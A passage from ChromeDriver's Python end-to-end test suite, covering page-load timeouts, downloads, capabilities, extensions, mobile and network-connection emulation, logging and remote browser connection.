self._http_server.SetCallbackForPath('/hang', self._handler.handle)
super(ChromeDriverPageLoadTimeoutTest, self).setUp()
self._driver = self.CreateDriver(
chrome_switches=['host-resolver-rules=MAP * 127.0.0.1'])
self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html')
self._driver.Load(self._initial_url)
# When send_response_event is set, navigating to the hang URL takes only
# about 0.1 second on Linux and Windows, but takes half a second or longer
# on Mac. So we use a longer timeout (3 seconds) on Mac and 0.5 second on
# other platforms.
timeout = 3000 if util.GetPlatformName() == 'mac' else 500
self._driver.SetTimeouts({'pageLoad': timeout})
def tearDown(self):
super(ChromeDriverPageLoadTimeoutTest, self).tearDown()
self._http_server.SetCallbackForPath('/hang', None)
def _LoadHangingUrl(self, host=None):
self._driver.Load(self._http_server.GetUrl(host) + '/hang')
def _CheckPageLoadTimeout(self, action):
self._handler.request_received_event.clear()
timed_out = False
try:
action()
except chromedriver.ChromeDriverException as e:
self.assertNotEqual(-1, e.message.find('timeout'))
timed_out = True
finally:
self._handler.send_response_event.set()
self.assertTrue(timed_out)
# Verify that the browser actually made that request.
self.assertTrue(self._handler.request_received_event.wait(1))
def testPageLoadTimeout(self):
self._CheckPageLoadTimeout(self._LoadHangingUrl)
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testPageLoadTimeoutCrossDomain(self):
# Cross-domain navigation is likely to be a cross-process one. In this case
# DevToolsAgentHost behaves quite differently and does not send command
# responses if the navigation hangs, so this case deserves a dedicated test.
self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar'))
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testHistoryNavigationWithPageLoadTimeout(self):
# Allow the page to load for the first time.
self._handler.send_response_event.set()
self._LoadHangingUrl()
self.assertTrue(self._handler.request_received_event.wait(1))
self._driver.GoBack()
self._CheckPageLoadTimeout(self._driver.GoForward)
self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())
def testRefreshWithPageLoadTimeout(self):
# Allow the page to load for the first time.
self._handler.send_response_event.set()
self._LoadHangingUrl()
self.assertTrue(self._handler.request_received_event.wait(1))
self._CheckPageLoadTimeout(self._driver.Refresh)
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
six.moves.urllib.request.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = list(map(int, v['version'].split('.')))
device = list(map(int,
self._driver.capabilities['browserVersion'].split('.')))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except six.moves.urllib.error.URLError as e:
print('Unable to fetch current version info from omahaproxy (%s)' % e)
def testDeviceManagement(self):
self._drivers = [self.CreateDriver()
for _ in device_utils.DeviceUtils.HealthyDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
def testAndroidGetWindowSize(self):
self._driver = self.CreateDriver()
size = self._driver.GetWindowRect()
script_size = self._driver.ExecuteScript(
'return [window.outerWidth, window.outerHeight, 0, 0]')
self.assertEquals(size, script_size)
script_inner = self._driver.ExecuteScript(
'return [window.innerWidth * visualViewport.scale, '
'window.innerHeight * visualViewport.scale]')
# Subtract 1 from the inner size to compensate for rounding errors.
self.assertLessEqual(script_inner[0] - 1, size[0])
self.assertLessEqual(script_inner[1] - 1, size[1])
# Sanity check: screen dimensions in the range 20-20000px
self.assertLessEqual(size[0], 20000)
self.assertLessEqual(size[1], 20000)
self.assertGreaterEqual(size[0], 20)
self.assertGreaterEqual(size[1], 20)
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def RespondWithCsvFile(self, request):
return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n'
def WaitForFileToDownload(self, path):
deadline = monotonic() + 60
while True:
time.sleep(0.1)
if os.path.isfile(path) or monotonic() > deadline:
break
self.assertTrue(os.path.isfile(path), "Failed to download file!")
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
# Deleting temp dir can fail if Chrome hasn't yet fully exited and still
# has open files in there. So we ignore errors, and retry if necessary.
shutil.rmtree(temp_dir, ignore_errors=True)
retry = 0
while retry < 10 and os.path.exists(temp_dir):
time.sleep(0.1)
shutil.rmtree(temp_dir, ignore_errors=True)
def testFileDownloadWithClick(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadWithClickHeadless(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadAfterTabHeadless(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/empty.html'))
new_window = driver.NewWindow(window_type='tab')
driver.SwitchToWindow(new_window['handle'])
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('css selector', '#red-dot').Click()
self.WaitForFileToDownload(download_name)
self.assertEqual(
ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'),
driver.GetCurrentUrl())
def testFileDownloadWithGet(self):
ChromeDriverTest._http_server.SetCallbackForPath(
'/abc.csv', self.RespondWithCsvFile)
download_dir = self.CreateTempDir()
driver = self.CreateDriver(download_dir=download_dir)
original_url = driver.GetCurrentUrl()
driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv'))
self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv'))
self.assertEqual(original_url, driver.GetCurrentUrl())
def testFileDownloadWithGetHeadless(self):
ChromeDriverTest._http_server.SetCallbackForPath(
'/abc.csv', self.RespondWithCsvFile)
download_dir = self.CreateTempDir()
driver = self.CreateDriver(download_dir=download_dir,
chrome_switches=['--headless'])
original_url = driver.GetCurrentUrl()
driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv'))
self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv'))
self.assertEqual(original_url, driver.GetCurrentUrl())
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
def testRemoteDebuggingPort(self):
"""Tests that passing --remote-debugging-port through capabilities works.
"""
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
port_flag = 'remote-debugging-port=%s' % port
try:
driver = self.CreateDriver(chrome_switches=[port_flag])
except:
continue
driver.Load('chrome:version')
command_line = driver.FindElement('css selector',
'#command_line').GetText()
self.assertIn(port_flag, command_line)
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
class ChromeDesiredCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes desired capabilities."""
def testDefaultTimeouts(self):
driver = self.CreateDriver()
timeouts = driver.GetTimeouts()
# Compare against defaults in W3C spec
self.assertEquals(timeouts['implicit'], 0)
self.assertEquals(timeouts['pageLoad'], 300000)
self.assertEquals(timeouts['script'], 30000)
def testTimeouts(self):
driver = self.CreateDriver(timeouts = {
'implicit': 123,
'pageLoad': 456,
'script': 789
})
timeouts = driver.GetTimeouts()
self.assertEquals(timeouts['implicit'], 123)
self.assertEquals(timeouts['pageLoad'], 456)
self.assertEquals(timeouts['script'], 789)
# Run in Legacy mode
def testUnexpectedAlertBehaviourLegacy(self):
driver = self.CreateDriver(unexpected_alert_behaviour="accept",
send_w3c_capability=False,
send_w3c_request=False)
self.assertEquals("accept",
driver.capabilities['unexpectedAlertBehaviour'])
driver.ExecuteScript('alert("HI");')
self.WaitForCondition(driver.IsAlertOpen)
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'unexpected alert open: {Alert text : HI}',
driver.FindElement, 'tag name', 'div')
self.assertFalse(driver.IsAlertOpen())
def testUnexpectedAlertBehaviourW3c(self):
driver = self.CreateDriver(unexpected_alert_behaviour='accept',
send_w3c_capability=True, send_w3c_request=True)
self.assertEquals('accept',
driver.capabilities['unhandledPromptBehavior'])
driver.ExecuteScript('alert("HI");')
self.WaitForCondition(driver.IsAlertOpen)
# With unhandledPromptBehavior=accept, calling GetTitle (and most other
# endpoints) automatically dismisses the alert, so IsAlertOpen() becomes
# False afterwards.
self.assertEquals(driver.GetTitle(), '')
self.assertFalse(driver.IsAlertOpen())
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testCanInspectBackgroundPage(self):
crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx')
driver = self.CreateDriver(
chrome_extensions=[self._PackExtension(crx)],
experimental_options={'windowTypes': ['background_page']})
handles = driver.GetWindowHandles()
for handle in handles:
driver.SwitchToWindow(handle)
if driver.GetCurrentUrl() == 'chrome-extension://' \
'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html':
self.assertEqual(42, driver.ExecuteScript('return magic;'))
return
self.fail("couldn't find generated background page for test extension")
def testIFrameWithExtensionsSource(self):
crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx')
driver = self.CreateDriver(
chrome_extensions=[self._PackExtension(crx_path)])
driver.Load(
ChromeDriverTest._http_server.GetUrl() +
'/chromedriver/iframe_extension.html')
driver.SwitchToFrame('testframe')
element = driver.FindElement('css selector', '#p1')
self.assertEqual('Its a frame with extension source', element.GetText())
def testDontExecuteScriptsInContentScriptContext(self):
# This test extension has a content script which runs in all frames (see
# https://developer.chrome.com/extensions/content_scripts) which causes each
# frame on the page to be associated with multiple JS execution contexts.
# Make sure that ExecuteScript operates on the page's context, rather than
# the extension's content script context.
extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames')
driver = self.CreateDriver(
chrome_switches=['load-extension=%s' % extension_path])
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/container.html')
driver.SwitchToMainFrame()
self.assertEqual('one', driver.ExecuteScript("return window['global_var']"))
driver.SwitchToFrame('iframe')
self.assertEqual('two', driver.ExecuteScript("return window['iframe_var']"))
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
# Run in Legacy mode
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowRect(600, 400, None, None)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
# Run in Legacy mode
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertRegexpMatches(
body_tag.GetText(),
'^' +
re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') +
r'\d+\.\d+\.\d+\.\d+' +
re.escape(' Mobile Safari/537.36') + '$')
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
# Run in Legacy mode
def testTapElement(self):
driver = self.CreateDriver(
send_w3c_capability=False, send_w3c_request=False,
mobile_emulation = {'deviceName': 'Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testNetworkConnectionDisabledByDefault(self):
driver = self.CreateDriver()
self.assertFalse(driver.capabilities['networkConnectionEnabled'])
def testNetworkConnectionUnsupported(self):
driver = self.CreateDriver()
# Network connection capability must be enabled to set/retrieve
self.assertRaises(chromedriver.UnknownError,
driver.GetNetworkConnection)
self.assertRaises(chromedriver.UnknownError,
driver.SetNetworkConnection, 0x1)
# Run in Legacy mode
def testNetworkConnectionEnabled(self):
# mobileEmulation must be enabled for networkConnection to be enabled
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True,
send_w3c_capability=False, send_w3c_request=False)
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertTrue(driver.capabilities['networkConnectionEnabled'])
def testEmulateNetworkConnection4g(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Test 4G connection.
connection_type = 0x8
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testEmulateNetworkConnectionMultipleBits(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Connection with 4G, 3G, and 2G bits on.
# Tests that 4G takes precedence.
connection_type = 0x38
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testWifiAndAirplaneModeEmulation(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Connection with both Wifi and Airplane Mode on.
# Tests that Wifi takes precedence over Airplane Mode.
connection_type = 0x3
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
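# Note on the connection_type hex literals used in these tests (an inferred
# mapping collected from the assertions and comments above, not an
# authoritative list): 0x1 = airplane mode (offline), 0x2 = WiFi, 0x8 = 4G,
# 0x10 = 3G, 0x20 = 2G. Several bits may be set at once (e.g. 0x38 = 2G|3G|4G,
# 0x3 = airplane mode|WiFi); per the comments above, the faster or connected
# state takes precedence.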
def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self):
def respondWithString(request):
return {}, """
<html>
<body>%s</body>
</html>""" % "hello world!"
self._http_server.SetCallbackForPath(
'/helloworld', respondWithString)
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
# Set network to online
connection_type = 0x10
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
# Open a window with two divs counting successful + unsuccessful
# attempts to complete XML task
driver.Load(
self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html')
window1_handle = driver.GetCurrentWindowHandle()
old_handles = driver.GetWindowHandles()
driver.FindElement('css selector', '#requestButton').Click()
driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(driver, old_handles)
self.assertNotEqual(None, new_window_handle)
driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle())
# Set network to offline to determine whether the XML task continues to
# run in the background, indicating that the conditions are only applied
# to the current WebView
connection_type = 0x1
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
driver.SwitchToWindow(window1_handle)
connection_type = 0x1
def testNetworkConnectionTypeIsAppliedToAllTabs(self):
driver = self.CreateDriver(
mobile_emulation={'deviceName': 'Nexus 5'},
network_connection=True)
driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html')
window1_handle = driver.GetCurrentWindowHandle()
old_handles = driver.GetWindowHandles()
# Test connection is offline.
connection_type = 0x1
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
# Navigate to another window.
driver.FindElement('css selector', '#link').Click()
new_window_handle = self.WaitForNewWindow(driver, old_handles)
self.assertNotEqual(None, new_window_handle)
driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle())
self.assertRaises(
chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link')
# Set connection to 3G in second window.
connection_type = 0x10
returned_type = driver.SetNetworkConnection(connection_type)
self.assertEquals(connection_type, returned_type)
driver.SwitchToWindow(window1_handle)
self.assertEquals(window1_handle, driver.GetCurrentWindowHandle())
# Test whether first window has old or new network conditions.
network = driver.GetNetworkConnection()
self.assertEquals(network, connection_type)
def testDefaultComplianceMode(self):
driver = self.CreateDriver(send_w3c_capability=None,
send_w3c_request=True)
self.assertTrue(driver.w3c_compliant)
def testW3cCompliantResponses(self):
# It's an error to send Legacy format request
# without Legacy capability flag.
with self.assertRaises(chromedriver.InvalidArgument):
self.CreateDriver(send_w3c_request=False)
# It's an error to send Legacy format capability
# without Legacy request flag.
with self.assertRaises(chromedriver.SessionNotCreated):
self.CreateDriver(send_w3c_capability=False)
# Can enable W3C capability in a W3C format request.
driver = self.CreateDriver(send_w3c_capability=True)
self.assertTrue(driver.w3c_compliant)
# Can enable W3C request in a legacy format request.
driver = self.CreateDriver(send_w3c_request=True)
self.assertTrue(driver.w3c_compliant)
# Asserts that errors are being raised correctly in the test client
# with a W3C compliant driver.
self.assertRaises(chromedriver.UnknownError,
driver.GetNetworkConnection)
# Can set Legacy capability flag in a Legacy format request.
driver = self.CreateDriver(send_w3c_capability=False,
send_w3c_request=False)
self.assertFalse(driver.w3c_compliant)
class ChromeDriverLogTest(ChromeDriverBaseTest):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chromedriver_server.GetPid(),
chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException as e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
def testDisablingDriverLogsSuppressesChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False)
try:
driver = self.CreateDriver(
chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'})
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
driver.AddCookie({'name': 'secret_code', 'value': 'bosco'})
driver.Quit()
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertNotIn('bosco', f.read())
class ChromeLoggingCapabilityTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'traceCategories': 'blink.console'
}}, logging_prefs={'performance':'ALL'})
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
if (cat == 'blink.console' and
devtools_message['params']['name'] == 'foobar'):
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Tracing'},
set(seen_log_domains.keys()))
def testDevToolsEventsLogger(self):
"""Tests that the correct event type (and no other) is logged"""
event = 'Page.loadEventFired'
driver = self.CreateDriver(
devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'})
driver.Load('about:blank')
logs = driver.GetLog('devtools')
for entry in logs:
devtools_message = json.loads(entry['message'])
method = devtools_message['method']
self.assertTrue('params' in devtools_message)
self.assertEquals(event, method)
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
def testGetSessions(self):
driver = self.CreateDriver()
response = driver.GetSessions()
self.assertEqual(1, len(response))
driver2 = self.CreateDriver()
response = driver2.GetSessions()
self.assertEqual(2, len(response))
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
temp_dir = util.MakeTempDir()
print('temp dir is ' + temp_dir)
cmd = [_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir,
'--use-mock-keychain']
process = subprocess.Popen(cmd)
try:
driver = self.CreateDriver(debugger_address='localhost:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
except:
continue
finally:
if process.poll() is None:
process.terminate()
# Wait for Chrome to exit here to prevent a race with Chrome to
# delete/modify the temporary user-data-dir.
# Maximum wait ~1 second.
for _ in range(20):
if process.poll() is not None:
break
print('continuing to wait for Chrome to exit')
time.sleep(.05)
else:
process.kill()
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
def testConnectToRemoteBrowserLiteralAddressHeadless(self):
debug_addrs = ['127.0.0.1', '::1']
debug_url_addrs = ['127.0.0.1', '[::1]']
for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs):
# Must use retries since there is an inherent race condition in port
# selection.
ports_generator = util.FindProbableFreePorts()
for _ in range(3):
port = next(ports_generator)
temp_dir = util.MakeTempDir()
print('temp dir is ' + temp_dir)
cmd = [_CHROME_BINARY,
'--headless',
'--remote-debugging-address=%s' % debug_addr,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir,
'--use-mock-keychain']
process = subprocess.Popen(cmd)
try:
driver = self.CreateDriver(
debugger_address='%s:%d' % (debug_url_addr, port))
driver.ExecuteScript(
'console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
except:
continue
finally:
if process.poll() is None:
process.terminate()
# Wait for Chrome to exit here to prevent a race with Chrome to
# delete/modify the temporary user-data-dir.
# Maximum wait ~1 second.
for _ in range(20):
if process.poll() is not None:
break
print('continuing to wait for Chrome to exit')
time.sleep(.05)
else:
process.kill()
break
else: # Else clause gets invoked if "break" never happens.
raise # This re-raises the most recent exception.
class LaunchDesktopTest(ChromeDriverBaseTest):
"""Tests that launching desktop Chrome works."""
def testExistingDevToolsPortFile(self):
"""If a DevTools port file already exists before startup, then we should
ignore it and get our debug port number from the new file."""
user_data_dir = tempfile.mkdtemp()
try:
dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort')
with open(dev_tools_port_file, 'w') as fd:
fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84')
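# The DevToolsActivePort file is expected to hold the debugging port on its
# first line and a browser DevTools target path on its second; the values
# written above are deliberately stale placeholders that a fresh Chrome launch
# should overwrite with its own port.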
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir])
with open(dev_tools_port_file, 'r') as fd:
port = int(fd.readlines()[0])
# Ephemeral ports are always high numbers.
self.assertTrue(port > 100)
finally:
shutil.rmtree(user_data_dir, ignore_errors=True)
def testHelpfulErrorMessage_NormalExit(self):
"""If Chrome fails to start, we should provide a useful error message."""
if util.IsWindows():
# Not bothering to implement a Windows test, since that would require
